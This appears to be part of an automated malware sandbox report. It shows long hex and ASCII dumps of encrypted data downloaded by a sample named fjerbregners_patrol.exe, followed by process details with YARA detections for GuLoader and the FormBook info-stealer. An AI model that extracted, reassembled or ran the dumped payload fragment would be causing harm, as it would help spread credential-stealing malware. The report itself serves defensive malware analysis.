                                                                                                                                                                                          2023-08-10 08:17:30 UTC197INData Raw: da 30 83 3f 53 45 67 af a1 88 d8 f4 5a 14 cd 23 ff d5 a0 43 a3 57 73 06 dc 6c 7d b4 55 20 3d 58 89 79 7a 27 e1 77 74 df 7f c6 be 1f 1d b0 96 ef 21 8a cb e0 33 79 4d 6f 96 b2 23 90 6f 23 61 02 fc fa 80 3c f9 40 3a 3d a2 f6 97 16 84 38 ba 7a de 05 ed bf c9 6a ab 8c 76 88 26 b0 0d c1 06 44 1a 87 22 44 35 16 8a 5b 9d cb 1c a1 cc e3 e7 c9 12 24 d4 0b 34 63 a9 5e e7 40 93 b2 d8 2a 5b cb 54 64 cf bf ed b1 31 52 51 2f 7b 30 7d 4d 85 9b 03 7d 25 4f 76 62 5f 62 02 0a 2b d4 d3 be 6d 13 4d ad 61 c2 25 53 70 e6 df 4f fe a4 de 10 48 c6 63 f1 3d 6c ac 2b 5d b6 f8 21 16 59 8a e1 43 c8 ef b5 23 c0 a3 d5 bf 6b 12 85 95 bd a8 be c2 5e 3b 76 5d 60 34 d1 9c 38 be c2 19 ea 48 02 2a b2 cb 21 52 4e 88 7e e2 d0 a7 85 5c bd f8 be ed 4f 0c f7 1e 48 44 41 3f 9b 70 de 90 ab 10 c3 32
                                                                                                                                                                                          Data Ascii: 0?SEgZ#CWsl}U =Xyz'wt!3yMo#o#a<@:=8zjv&D"D5[$4c^@*[Td1RQ/{0}M}%Ovb_b+mMa%SpOHc=l+]!YC#k^;v]`48H*!RN~\OHDA?p2
                                                                                                                                                                                          2023-08-10 08:17:30 UTC198INData Raw: a0 76 e4 6f ab 83 84 21 c6 50 51 06 2c 8c 09 ba 67 7e a9 f9 53 92 c7 99 55 5e 0c 49 f4 c3 4f d5 2c 66 78 2c 4d 09 1a ee a5 64 f6 5b 50 50 b5 ff ad 10 12 b8 52 d3 7a 2b 85 76 4d 5a 2d 67 60 19 a0 13 c9 68 62 5d bb 6e 4b a1 46 bc f2 98 89 c1 7e 26 e1 66 86 1e 5f 56 5e dd 48 31 f7 db a4 9c 9b ab ca cb 56 57 0a 0c 93 69 f8 cd 09 b1 bc 61 27 46 00 61 2d d0 c5 1f 83 eb a7 46 63 3d 53 8e 2e 7c 07 bd 1f 35 02 6b 6a 20 54 b6 f0 85 02 29 0f 58 cd 5a 15 56 c4 da b8 b0 08 97 44 64 c1 c5 8f 18 e8 95 32 ff 23 20 d5 76 2d 87 8c 9c 84 b4 73 5d d9 b2 ae 6a 1c 98 47 a1 85 c5 3b 90 c3 f5 08 8d 89 77 01 87 92 51 67 22 e5 49 21 cb 1f cf e7 ee 78 a6 95 87 d2 89 b7 08 34 f9 dd cf de 53 77 59 fd 65 4d c4 d0 6c 78 d0 ac c1 78 a9 30 72 52 37 df 8b a5 56 a1 3e 5c cd 78 ce 17 84 df
                                                                                                                                                                                          Data Ascii: vo!PQ,g~SU^IO,fx,Md[PPRz+vMZ-g`hb]nKF~&f_V^H1VWia'Fa-Fc=S.|5kj T)XZVDd2# v-s]jG;wQg"I!x4SwYeMlxx0rR7V>\x
                                                                                                                                                                                          2023-08-10 08:17:30 UTC200INData Raw: b3 84 a7 45 4f a3 d2 60 ce 8f 93 04 78 2a 42 2e 7b fb 1c 28 7a 82 1e 35 56 dc ae 35 b1 73 d0 fa e4 06 0b d7 e2 67 ea 8c a2 35 f0 50 52 56 9c a3 c9 24 07 fa 5f 43 1c b0 b3 e2 f5 a2 0c 46 61 2c 09 b7 73 83 0e bc 9d 91 c6 12 0d 27 3b 5a 71 10 a8 7a e2 e4 40 40 f6 25 29 50 92 91 1f 95 58 c2 9d 65 81 df 52 58 8d 81 f7 f2 a2 2e 69 76 fc 50 25 ba 8e 2f f6 b2 43 ec 60 dc 6e 3c ca e0 97 63 f7 80 8e ee 54 f2 44 b9 2a fd f5 f0 81 bd 9a ee 31 16 1e 2d 4a bd 5b cd 5e 29 75 f1 e3 55 cb d8 b5 fa a0 6b ed 42 38 fe 35 8a 55 4d 63 f6 5d a9 f4 c1 81 62 bc 20 c0 7b 80 be 2b 60 f4 46 fb a9 ee 67 31 ff 6e 3f 2d d4 bc d9 18 b5 13 06 2a 92 7d a9 02 2b 81 fe 5e 0c fe e6 ce c3 e2 26 26 07 86 a3 65 05 fc 7f 58 49 ad 65 fc db c5 be 15 45 8b d0 77 13 3b 84 22 0c 71 36 ba 21 3c 59 34
                                                                                                                                                                                          Data Ascii: EO`x*B.{(z5V5sg5PRV$_CFa,s';Zqz@@%)PXeRX.ivP%/C`n<cTD*1-J[^)uUkB85UMc]b {+`Fg1n?-*}+^&&eXIeEw;"q6!<Y4
                                                                                                                                                                                          2023-08-10 08:17:30 UTC201INData Raw: 3b d2 a5 c8 7c 34 8a af bf 2b 3a a6 76 26 0b 30 76 8c d2 f6 a1 1a 60 8a 55 c2 79 fa f4 c5 50 18 41 71 a2 e7 1f 65 36 b6 d7 67 11 15 c6 da fa 4e 8c d9 52 71 20 46 9f a1 f8 7c 01 7c eb 56 97 14 ca 20 e7 af ff b2 c9 1b f1 91 09 2f db 89 d3 89 6c df 63 11 ff c3 46 5e cb 95 e1 d7 95 c2 17 ff 0f 04 84 30 61 48 69 e0 b4 8b ff 16 89 96 94 82 8e 40 2a ec 00 80 38 3f 18 5c d0 c0 98 49 fb 08 47 fc 29 b5 b7 5f da 49 e0 5e 38 f3 0c d3 ec 2f 77 c3 fc 61 8c 63 95 94 9f c9 78 1c 9f 87 50 e8 3e d4 7f 78 13 a1 54 3f 9e 50 4c 9f 05 48 58 a7 ec eb 5b f4 b1 90 1f dc d9 fa 78 28 59 ff 30 2a 9b fe 38 34 14 f0 f5 a1 0d 95 8a f6 6f 64 15 c7 74 f9 77 db 83 9a 58 27 e3 33 2e 09 19 00 71 65 7e d2 ff ac dc 22 56 dc 4e d2 5b 73 e2 ef cc 1d 64 c7 c4 b4 f0 48 dd 1e ae 48 2a 63 6d 42 b5
                                                                                                                                                                                          Data Ascii: ;|4+:v&0v`UyPAqe6gNRq F||V /lcF^0aHi@*8?\IG)_I^8/wacxP>xT?PLHX[x(Y0*84odtwX'3.qe~"VN[sdHH*cmB
                                                                                                                                                                                          2023-08-10 08:17:30 UTC202INData Raw: 5b e4 43 cd 63 6a cb 07 4d 27 76 e5 3a c9 03 79 f1 20 fc 07 87 cc 93 42 24 a4 3b 85 1a 49 70 74 1a f7 e7 92 30 e9 bc e3 5d 9b 59 01 02 cf dd e1 62 e3 69 ac 4b db bc a3 eb 46 85 94 cf f6 a7 a9 d8 b3 3a fd b5 1c 13 d1 a2 fc ee 6e 2a 28 c3 86 f2 08 a8 06 0f 7e 26 32 77 96 95 65 e5 f5 91 a1 83 86 7a 1c 62 df 4b a8 57 4d 20 41 c1 2f 1c ab e4 52 2c d6 3a 70 b8 b3 5d c5 eb 31 73 3a ac 8e 3b 82 19 39 32 cd 0a b6 11 53 21 cd 6a f0 04 2c 1c 14 f6 9e 7a 77 82 c7 5f c1 53 1f df e2 19 2a 4c 61 ce 6f 69 d1 b0 9d 5e 06 43 84 25 fb 01 bc d9 f5 13 72 5f 29 93 01 25 c9 d4 1a 55 df 9a 61 ad c1 c8 95 56 ac 65 35 da f0 b4 a4 fe c7 2d 00 51 f2 e1 35 43 4e 34 30 46 ed 6a a5 e3 a2 8c 90 49 75 9e c2 1e 84 9c ea b3 42 46 77 70 85 b6 4f cd 25 66 16 cf 55 4a 75 32 37 c2 3d 40 aa 0b
                                                                                                                                                                                          Data Ascii: [CcjM'v:y B$;Ipt0]YbiKF:n*(~&2wezbKWM A/R,:p]1s:;92S!j,zw_S*Laoi^C%r_)%UaVe5-Q5CN40FjIuBFwpO%fUJu27=@
                                                                                                                                                                                          2023-08-10 08:17:30 UTC203INData Raw: c7 92 38 bd f6 40 48 66 97 e1 7a af e2 09 52 f2 37 3c fd e3 2e 34 29 95 70 6b 0f fa b5 f7 e4 eb bb b1 6b ae bc 96 f0 d1 2b 89 1b 2d 1a 4c 80 4f f3 59 5d 4d f5 31 7d f8 95 28 83 2f 4d 27 b6 2a 5f f7 8d 2b 50 18 be 76 61 74 f6 eb 66 73 46 52 11 8c d3 81 38 e7 29 af a6 37 14 2c df 55 71 3f 01 84 17 76 70 87 61 03 0e f8 92 5c 62 97 9d f1 7a 03 8a 93 3e dc 47 c6 ba 4e 7a 12 5d 01 a6 ee 02 08 58 fe 5e 52 25 ee ce 1c 8c f0 d0 e0 43 cd e3 3f f0 04 17 5e 06 29 62 e1 29 48 75 28 c8 b0 2c 07 2f 06 2a 72 0a c4 13 ee cd c6 7a b6 61 e6 49 02 4c 1f 0f 14 e3 a7 2a 81 d9 48 fa ea 6a c6 40 8b 4d 98 61 6b 34 c8 d6 b3 e2 d4 21 16 32 cc d5 9f f2 53 52 ca 44 11 e3 3f 7e 65 b6 59 ed 8d 34 5c 3d bc 5d 14 3a 4b f1 a2 5c aa 55 f8 60 7c 3c 9c a3 4c b9 7c 90 98 d8 15 cb eb 55 ab 17
                                                                                                                                                                                          Data Ascii: 8@HfzR7<.4)pkk+-LOY]M1}(/M'*_+PvatfsFR8)7,Uq?vpa\bz>GNz]X^R%C?^)b)Hu(,/*rzaIL*Hj@Mak4!2SRD?~eY4\=]:K\U`|<L|U
                                                                                                                                                                                          2023-08-10 08:17:30 UTC205INData Raw: 6a 8e 5b f3 ec 7d d0 f0 b3 fd 4d 2a 5d 77 cf 05 e9 35 2b 90 89 24 ea 7c 8b 67 f8 03 5b 92 40 9f e6 b5 aa f8 92 1e e3 76 3e 01 2f 97 e3 b4 3d c3 41 59 2e d5 96 54 2d fc 33 95 cd 57 f6 5b 84 3f 11 65 58 2d 6f 8e af 1e fa b0 45 5d 4e 59 3d 20 6e b0 2f e5 54 a6 f6 ed 2e 92 6c 51 ea 97 68 7e 02 0e 6b 49 59 ce 57 41 46 9b 6e 65 12 5f 9a be f4 92 62 20 38 e2 7c 5b 82 9d bc 8f e3 98 4d 63 7d bc 93 3b 47 62 cb 56 d1 3e c5 1c 36 02 f4 b8 e0 1e 62 2b 32 14 e5 e7 b9 22 f1 4e a3 27 54 cc 28 b9 5c ca c3 1f 72 80 5e 28 7a 82 b1 31 65 04 ee d3 3e 87 e4 65 bb bd 37 14 de 84 ac 10 66 bc a6 61 55 24 02 33 ab cb 6d cc d7 17 68 46 39 6d 4d 15 03 4e 7b 97 d1 25 e7 39 87 ab cd 65 dc b0 94 f2 74 fc fa 23 7a 91 e3 a9 af 38 7c 25 e3 dd 62 02 23 0e b8 4f a4 65 73 05 29 89 0e cc 30
                                                                                                                                                                                          Data Ascii: j[}M*]w5+$|g[@v>/=AY.T-3W[?eX-oE]NY= n/T.lQh~kIYWAFne_b 8|[Mc};GbV>6b+2"N'T(\r^(z1e>e7faU$3mhF9mMN{%9et#z8|%b#Oes)0
                                                                                                                                                                                          2023-08-10 08:17:30 UTC206INData Raw: 79 de 8a 59 f6 3f 82 97 16 ff 77 ab 0a b7 f6 af 0d 80 42 74 d2 09 40 f3 cc 36 bf 0b c2 24 57 29 f1 59 39 d1 e2 0f 3d 45 d6 7a f6 78 28 36 8b 12 9d 4d a2 9f f9 c2 21 94 4c d7 56 f4 f2 36 35 29 b5 2c 02 4d e4 6d dc 00 c8 ae 8d 54 9a 88 5f f3 fe e6 82 c1 03 70 60 39 3d a2 9c 80 d6 04 bd c4 c0 64 b2 a3 c2 1c f1 60 b8 9d e6 e6 c6 7d d4 a5 96 05 00 94 69 1a d6 18 e9 f7 bb 5a c5 a4 72 e4 3e c0 04 ab 6f 04 d5 ae 2f fe d9 dd 53 50 b8 4d 46 6a 82 47 40 49 b1 28 52 86 4a 69 1d 63 a3 5c 39 87 78 73 dd 17 31 2d 9a 3c b5 b1 f7 37 a7 34 0e c3 af bd e6 51 33 33 9a 34 89 21 be 13 f2 d7 8d 8f 4f 7d fa b4 e2 97 fd 63 06 67 ea a8 d3 5f 20 75 e1 51 aa ef 52 65 35 a4 b2 53 36 bd 48 dd 60 10 49 05 1b 49 a5 2c 36 83 10 7f d8 8f 34 a5 68 1a 05 7e 0a 94 1c 90 62 fe b6 ff 6c 49 97
                                                                                                                                                                                          Data Ascii: yY?wBt@6$W)Y9=Ezx(6M!LV65),MmT_p`9=d`}iZr>o/SPMFjG@I(RJic\9xs1-<74Q334!O}cg_ uQRe5S6H`II,64h~blI
                                                                                                                                                                                          2023-08-10 08:17:30 UTC207INData Raw: 0c b1 32 83 c7 18 ad 07 47 b4 90 a7 27 29 e8 f9 10 28 2f d2 33 84 18 87 c2 42 6a 35 fb b3 6c 14 1e 2c ec ad 79 95 bd e8 2c dd 6a 9a a5 79 ea 49 87 f3 09 3d 52 d0 36 b7 35 29 b2 14 46 96 e9 8b c1 dd fd 45 5f 9f e3 92 0e 8f 75 5c b8 8e 9e 68 3f 95 f5 48 7f 5b 61 24 21 75 b2 50 3b c1 59 76 31 96 81 29 d9 c2 fd c9 1f a2 a7 62 e9 ec c1 f8 32 9a e4 da 04 b3 c3 17 57 72 7a 2f ca 3d 39 35 3f 62 d6 aa 4f 69 b5 38 8c 11 e2 89 05 89 bd 01 51 95 e2 16 fb 47 ea 16 10 8d c5 7c 6d 0a 0c b9 f9 8f 84 1b 4d 46 25 51 d2 bc 55 bf 2d 55 65 87 6e 93 23 da 2d 2f e1 85 fb ac 14 e7 38 a5 5e b6 da cd e1 d2 22 bc f4 e3 f0 f6 68 34 27 16 de d5 cf c2 11 23 b5 b1 31 99 eb 4d 6a 16 fa 6b e5 f6 67 32 ab 20 d3 f4 83 c3 16 da 8f b9 90 53 1b 0f 71 28 c1 18 21 7d e3 a8 7e f8 a6 7c c2 f1 b6
                                                                                                                                                                                          Data Ascii: 2G')(/3Bj5l,y,jyI=R65)FE_u\h?H[a$!uP;Yv1)b2Wrz/=95?bOi8QG|mMF%QU-Uen#-/8^"h4'#1Mjkg2 Sq(!}~|
                                                                                                                                                                                          2023-08-10 08:17:30 UTC208INData Raw: c3 c8 87 24 16 14 47 6a 56 54 a1 88 f9 0c 7b e1 fc 42 01 d7 d5 80 6d 32 3a de 72 b8 9f 3d 77 25 23 1b 6f 27 4a e4 3f a0 be 50 31 e8 2d 41 1e fd d9 f9 54 2f fa 32 6c 13 9d f4 b8 75 63 a9 72 4d c2 15 00 9c b9 92 2e fc 11 2e 64 d4 a9 69 c2 76 8a 17 0e 19 85 d5 27 bc be a5 23 f4 42 98 fd c4 c2 0d f7 29 b9 61 b0 69 35 59 ed b7 c0 65 00 3b 81 26 8f 47 55 20 26 b7 0b 1f 41 86 1a 17 f6 45 91 3c 59 fe c3 29 e9 8f f2 da ef f7 02 87 62 70 fe fc 7e a5 29 82 90 3e d2 d3 19 61 21 b7 96 dc 3e 48 f6 bf 79 25 c9 c8 96 f7 0a b3 da d5 29 c6 70 db af 85 18 52 85 79 2d fc e9 e5 5d e8 50 85 12 6c 34 41 a8 53 40 8e 0b 10 76 7b 0d 5e 3a 27 21 e7 42 94 14 24 87 58 f6 35 c8 dc 56 79 98 47 de 8d 83 f0 42 9c fd b6 da 51 78 f3 98 84 dd fb cb b8 b0 07 31 04 7c cb 49 27 c6 25 4d 60 da
                                                                                                                                                                                          Data Ascii: $GjVT{Bm2:r=w%#o'J?P1-AT/2lucrM..div'#B)ai5Ye;&GU &AE<Y)bp~)>a!>Hy%)pRy-]Pl4AS@v{^:'!B$X5VyGBQx1|I'%M`
                                                                                                                                                                                          2023-08-10 08:17:30 UTC209INData Raw: d0 70 ec a6 5e 61 a6 2f f8 ea c9 24 ab 6c 14 53 89 4d e7 d7 3c 9b da 4b d5 d5 46 1b 08 ca 32 a3 a0 12 15 e8 cd ac 9a a6 2b b1 35 34 a0 35 d1 c6 09 ed ec 80 68 18 ee c0 62 81 3b 93 9b a0 ef e9 69 a8 00 59 cc 22 fa 47 85 12 9c 52 87 e0 7f ab 80 9b d5 69 f9 13 69 41 42 88 7e 15 f0 34 8d a9 a2 db 6f 2f a2 d1 97 fe 4b ee e8 06
                                                                                                                                                                                          Data Ascii: p^a/$lSM<KF2+545hb;iY"GRiiAB~4o/K
                                                                                                                                                                                          2023-08-10 08:17:30 UTC210INData Raw: a9 cf 3d 26 8f e5 b6 0e c1 1f 3b b1 cc a8 6d 4c a2 97 0c 3f 53 4a e0 1d 5b 77 9c d4 0a 0b c5 8a 49 d1 26 bb 88 c7 86 55 cc ef 99 d3 2b 4f 34 3a ac 29 35 d0 e6 16 b5 1e b0 c7 dc db c7 ec 3b 1a e6 5e ae 06 a9 f2 a9 2f d8 da 25 8c 54 7a 61 37 18 1c ab 7b 59 1b bc 3c dc be fd 83 6b fe 5d fd 61 97 27 33 ab 37 af 25 f4 0d d4 fe f2 c0 1d 18 d5 0d 53 06 59 37 ea 13 fe 67 72 0d d9 48 39 ee 49 b2 cc c6 83 43 e5 75 07 24 21 72 09 98 7f b0 f8 0f 10 3b 06 76 95 f2 aa db 7d 71 9f 36 f3 53 d1 f8 2b ea b7 3f 2d df 93 9f 35 23 69 d5 32 d3 a1 86 f4 e4 91 d2 85 a3 c8 8d 4b 9f cf d3 61 d3 fc c3 6b fc 9e 73 de 09 43 19 12 f2 aa e2 e0 0a a1 3f c0 75 3e ea ff 4c 4d ed ed 50 c3 21 f5 fa 18 a2 ee 0b 6f 8c 45 9a 5d 40 cf 78 bf e4 15 db 28 9e ae 1d ae 08 9d da 87 79 0c e3 3a fa db
                                                                                                                                                                                          Data Ascii: =&;mL?SJ[wI&U+O4:)5;^/%Tza7{Y<k]a'37%SY7grH9ICu$!r;v}q6S+?-5#i2KaksC?u>LMP!oE]@x(y:
                                                                                                                                                                                          2023-08-10 08:17:30 UTC211INData Raw: 72 9e c8 f8 dd f1 5e 38 0c 9a 62 4c 5b 62 81 4f 2d 65 eb 96 b3 c3 85 ab a8 a6 92 c3 7e e0 22 ac 32 dd 9c 20 d7 41 9d 45 08 62 e5 a2 1c d1 04 c1 1e f2 43 ab 84 13 4d 95 22 45 ff 4a 30 ce 09 35 7a 9f 4c b7 ee cb b1 22 9d 2f d6 a0 4e 5d 05 cb 74 6e 4d e1 01 02 34 fc 9f a1 ae af e5 da 44 30 38 9f 5d af 51 21 62 80 0b 29 66 b7 b9 63 4d 12 5e 6a 6c 98 65 8c 52 2f 8d a2 01 62 51 69 d5 b8 33 dd 0e ce e6 c9 ce 8b 86 fe 7b 56 33 75 10 07 fa 44 86 29 ff 48 0a c4 4c 1f 08 90 fa db bd 99 ed e5 40 f1 f5 cb f6 ab 71 7b 9f ff c5 88 d0 37 4e b2 c7 71 41 fa 66 8f 4b 00 cc 88 58 af 3c 61 d0 59 51 36 fb b8 57 f6 2c fe 6f fc c7 8c 18 12 e8 20 ad d2 e1 f3 64 65 51 80 93 7b b3 bd 01 1e f9 1a 08 4f 7f ae 66 04 e6 4a 34 e3 48 4b 6a 8e 53 39 7b 17 7f 3f 16 34 c0 19 81 ba 9b 36 91
                                                                                                                                                                                          Data Ascii: r^8bL[bO-e~"2 AEbCM"EJ05zL"/N]tnM4D08]Q!b)fcM^jleR/bQi3{V3uD)HL@q{7NqAfKX<aYQ6W,o deQ{OfJ4HKjS9{?46
                                                                                                                                                                                          2023-08-10 08:17:30 UTC212INData Raw: 87 5f 16 ac 43 1e a0 6d ad c1 fd 08 1c e5 dd e2 dd de 01 94 50 f7 ab ec bf b6 d3 f7 05 ee 99 a5 77 51 da ee cb f6 fd c3 bd cb f1 55 1e 29 08 48 1e 97 44 97 46 57 1a 72 8a 02 67 6e 47 47 3d cd 93 1b 66 25 49 22 a6 fb 61 93 c2 48 fa 87 20 08 9b 79 96 f9 4a 91 4b e0 c7 5b c3 6d b4 b5 9a 41 ed 12 63 c3 bc c9 80 be 2a 87 78 25 68 a3 a1 79 a8 bc ff 01 ee ea 46 7f a6 07 b9 95 ca 33 fa e4 df 33 18 8b 2b 7e 31 16 4b 37 29 ad 4b 09 0e 8f b5 55 ba f7 dd 75 65 a9 cb ee e7 14 e0 18 b3 1b 4c ed f4 b0 34 70 e4 ea 33 09 68 71 4d 0d c7 09 1e fd 49 19 12 4c 4f ac 23 8f 61 6f f2 bc e3 91 dd 59 75 02 1c ef ff 78 6e 2e 0d 8c bf a1 78 d7 46 9b b1 e7 79 4a 89 8c bf 6a bb a6 9d 50 35 be c4 4b c5 e2 e0 ee 14 6c 51 1f 15 e1 a9 5c 4a d0 9d d1 e3 72 74 d8 af 6b 7e f0 26 1b 64 18 e0
                                                                                                                                                                                          Data Ascii: _CmPwQU)HDFWrgnGG=f%I"aH yJK[mAc*x%hyF33+~1K7)KUueL4p3hqMILO#aoYuxn.xFyJjP5KlQ\Jrtk~&d
                                                                                                                                                                                          2023-08-10 08:17:30 UTC213INData Raw: 36 62 79 a7 85 f7 c8 fc f0 10 2d 9c 9e f2 ec 06 f6 b1 d3 ec 06 51 17 18 92 7f d0 de b5 2e 15 ce 8b b8 d1 b9 a3 dc ee fd 61 91 fa 3d 13 65 5b e1 6f d2 b6 a9 7b d8 b8 5c 66 6d 24 c0 ca 24 f4 3f d0 1b 8d c5 1d 5e 72 09 fb 3d 61 9e ab 8d cf fb e2 66 42 b4 4d 98 f0 71 14 b5 ca e8 4b 7f 15 0c 71 18 1f bb 54 9d 05 db 6e 65 57 0b 44 39 4b df 56 4f cf c8 57 3e 97 fa 72 99 16 4d 1a f0 df 5a fd 95 82 19 b0 de 4d 98 14 5e 52 24 b1 67 82 34 f3 bb 3d cf 96 ba 81 c4 41 81 00 81 c3 95 80 32 c4 16 20 c9 9c 4c 76 a1 30 80 11 08 f3 06 7b 38 da a0 0f 2a 5b 72 40 6c db 44 bc 97 16 c9 5d 1e 2d 39 e0 67 d4 36 f4 60 4d f4 c9 30 bc ff 7d 8c 27 cd a9 2d 24 16 73 71 20 86 da ce 21 71 be 34 2d 92 00 7b 97 b5 6f 27 dc 65 2b 25 1e d1 5c 3b c3 d7 76 5a ae 29 4a a2 ff 4e fc 3b 60 10 9c
                                                                                                                                                                                          Data Ascii: 6by-Q.a=e[o{\fm$$?^r=afBMqKqTneWD9KVOW>rMZM^R$g4=A2 Lv0{8*[r@lD]-9g6`M0}'-$sq !q4-{o'e+%\;vZ)JN;`
                                                                                                                                                                                          2023-08-10 08:17:30 UTC214INData Raw: 47 41 25 6b 0a 6d 08 05 ff d1 95 ea 67 6a 53 75 4c f2 97 4b b3 85 71 d3 8c 49 49 06 a6 6e 1c 33 db 9e 87 60 3c e3 27 06 25 11 ac d4 34 d3 30 21 f6 a3 21 03 92 87 bb ae ea 5a d7 a9 28 ff 97 48 61 44 2f c7 ee c9 4d c2 8a 6a 8d 31 0a 7b f6 14 86 af e4 70 8d d4 8e 95 7f a3 7b 06 78 c8 99 ed 3c 0c 16 03 cb 54 08 93 d6 e8 82 40 17 31 d8 60 7b 7f 2c a6 5e c1 70 ef 48 7c 9b 95 92 85 59 2a 2d bb 23 12 08 4b 0c de 64 d8 d2 bc ae 61 9a 97 b7 22 0e ec e5 db 9b 9b d1 7c 6b 95 de 84 91 1e 84 90 fa 59 4f 8b b8 92 4b 73 8d 24 cc 21 60 68 76 a3 d8 1a 5b 50 3c 7a 53 fc 19 6a 60 5e e1 b6 dd ce e9 fa 76 56 a1 e5 8c 75 86 ae 0a 5f 38 6c 9b 61 f7 e8 79 8a b0 a8 05 41 3e 80 9b 69 94 16 d9 a8 7e 54 f5 6c b0 e5 de e2 a1 44 75 9a 05 7d cf a4 d0 82 02 04 d0 e8 d8 d9 ef d2 5d 56 1f
                                                                                                                                                                                          Data Ascii: GA%kmgjSuLKqIIn3`<'%40!!Z(HaD/Mj1{p{x<T@1`{,^pH|Y*-#Kda"|kYOKs$!`hv[P<zSj`^vVu_8layA>i~TlDu}]V
                                                                                                                                                                                          2023-08-10 08:17:30 UTC216INData Raw: fa a2 95 e9 02 09 00 4d 0d 4d 95 52 37 0a 77 71 6e 11 5a 6b 07 47 be 5d f5 5d 55 5e 46 ca 7f 0d ca b6 c3 6a 20 80 75 d0 4b 8f b9 a6 43 b1 d1 5a 69 90 c2 39 ef 56 04 54 00 68 23 61 2b 96 35 be 3f d5 7b 7a 86 bd b3 85 83 79 2d 74 62 53 6c 64 23 0b a1 91 da a7 22 70 58 25 59 64 bc 85 96 c6 94 3b dd 88 89 2d 19 f1 69 c3 a3 e5 e0 d0 59 a3 97 f8 db 38 04 93 c8 ce e3 ff 2e d4 5e 64 f1 97 89 07 1f 83 6f b2 5c 74 5b e5 de 28 e8 b7 47 25 3d 5f c6 84 f3 69 3a 82 ae 6b b0 75 2b 3e 63 52 9a 04 68 d5 03 71 3c b4 cd 34 3f e6 97 c0 6b 30 9d 85 02 1a 12 cc 33 0f da c2 67 d2 f1 f2 e0 45 86 6a d5 5d 49 2a 13 af de 42 22 a7 b2 52 8b 73 ee f0 0e bb fb ba 37 f4 d4 be d8 0e b1 23 33 02 80 92 89 62 2e 40 6c d1 14 e7 bf 90 7f 8a 0b 88 d2 aa 65 f5 e7 34 28 16 5c 33 1c 47 e8 8c 49
                                                                                                                                                                                          Data Ascii: MMR7wqnZkG]]U^Fj uKCZi9VTh#a+5?{zy-tbSld#"pX%Yd;-iY8.^do\t[(G%=_i:ku+>cRhq<4?k03gEj]I*B"Rs7#3b.@le4(\3GI


                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:10:16:39
                                                                                                                                                                                          Start date:10/08/2023
                                                                                                                                                                                          Path:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:497'089 bytes
                                                                                                                                                                                          MD5 hash:D7C6BA8AF8325A9FC1AC197916EECFDA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3673097625.000000000598E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:10:17:23
                                                                                                                                                                                          Start date:10/08/2023
                                                                                                                                                                                          Path:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:497'089 bytes
                                                                                                                                                                                          MD5 hash:D7C6BA8AF8325A9FC1AC197916EECFDA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3794736895.00000000339B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:10:17:32
                                                                                                                                                                                          Start date:10/08/2023
                                                                                                                                                                                          Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                          File size:16'696'840 bytes
                                                                                                                                                                                          MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:10:17:33
                                                                                                                                                                                          Start date:10/08/2023
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                          Imagebase:0x180000
                                                                                                                                                                                          File size:344'064 bytes
                                                                                                                                                                                          MD5 hash:A9AB42610361BF6432259061737EA309
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.5562833277.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
